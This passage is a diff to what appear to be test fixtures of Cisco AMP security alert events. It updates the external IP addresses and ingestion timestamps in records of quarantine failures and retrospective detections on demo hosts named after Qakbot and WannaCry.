"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "553648155", "kind": "alert", "action": "Retrospective Quarantine", @@ -5355,7 +5355,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5398,7 +5398,7 @@ "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -5412,8 +5412,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025387308Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"igvj$vN.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\igvj$vN.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "ingested": "2021-12-09T13:35:39.764387200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"igvj$vN.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\igvj$vN.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -5435,7 +5435,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5478,7 +5478,7 @@ "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -5492,8 +5492,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025389632Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"6951045.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\6951045.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "ingested": "2021-12-09T13:35:39.764393100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"6951045.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\6951045.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -5515,7 +5515,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5562,7 +5562,7 @@ "99fffe78e0cbd7b508eed13a8633903dd89ed5f1" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -5576,8 +5576,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025391879Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"99fffe78e0cbd7b508eed13a8633903dd89ed5f1\",\"md5\":\"dc41e47ebba549ec5e616ed9e88a0376\"}}}}", + "ingested": "2021-12-09T13:35:39.764398700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"99fffe78e0cbd7b508eed13a8633903dd89ed5f1\",\"md5\":\"dc41e47ebba549ec5e616ed9e88a0376\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -5599,7 +5599,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5640,7 +5640,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -5650,8 +5650,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025394104Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764405100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -5671,7 +5671,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5716,7 +5716,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -5726,8 +5726,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025400013Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764410300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -5747,7 +5747,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5792,7 +5792,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -5802,8 +5802,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025403940Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764416200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -5823,7 +5823,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5868,7 +5868,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -5878,8 +5878,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025406294Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764425100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -5899,7 +5899,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5944,7 +5944,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -5954,8 +5954,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025408560Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764429400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 